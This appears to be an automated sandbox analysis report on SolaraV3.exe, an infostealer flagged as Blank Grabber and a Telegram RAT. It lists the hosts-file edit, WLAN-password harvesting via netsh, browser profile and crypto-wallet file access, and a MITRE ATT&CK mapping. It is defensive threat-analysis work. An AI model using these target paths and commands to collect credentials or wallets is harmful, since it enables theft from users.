Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 1_2_00007FF6DC70D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_00007FF6DC70D010

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 1_2_00007FF6DC725E7C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

1_2_00007FF6DC725E7C

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

Code function: 110_2_00007FF74EEB48CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,

110_2_00007FF74EEB48CC

Source: C:\Users\user\Desktop\SolaraV3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the hosts file

Source: C:\Users\user\Desktop\SolaraV3.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

Stealing of Sensitive Information

Yara detected Blank Grabber

Source: Yara match	File source: 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1563577276.000001EA23124000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1563577276.000001EA23122000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2034413215.000001FC25CB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SolaraV3.exe PID: 2884, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SolaraV3.exe PID: 4892, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI28842\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: SolaraV3.exe PID: 4892, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxxz
Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Exodusz
Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: EthereumZ
Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystoreZ

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

File read: C:\Users\user\AppData\Local\Temp\ ?? ? \Credentials\Chrome\Chrome Cookies.txt

Source: Yara match	File source: 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SolaraV3.exe PID: 4892, type: MEMORYSTR

Remote Access Functionality

Yara detected Blank Grabber

Source: Yara match	File source: 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1563577276.000001EA23124000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1563577276.000001EA23122000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2034413215.000001FC25CB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SolaraV3.exe PID: 2884, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SolaraV3.exe PID: 4892, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI28842\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: SolaraV3.exe PID: 4892, type: MEMORYSTR

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 2_2_00007FFB0B812B62 bind,WSAGetLastError,

2_2_00007FFB0B812B62

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	241 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 File and Directory Permissions Modification	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	3 Native API	2 Registry Run Keys / Startup Folder	1 Access Token Manipulation	4 Disable or Modify Tools	1 Credentials In Files	3 File and Directory Discovery	Remote Desktop Protocol	31 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	1 System Shutdown/Reboot
Email Addresses	DNS Server	Domain Accounts	222 Command and Scripting Interpreter	Logon Script (Windows)	11 Process Injection	11 Deobfuscate/Decode Files or Information	Security Account Manager	58 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	2 Registry Run Keys / Startup Folder	21 Obfuscated Files or Information	NTDS	271 Security Software Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Software Packing	LSA Secrets	2 Process Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	151 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	151 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
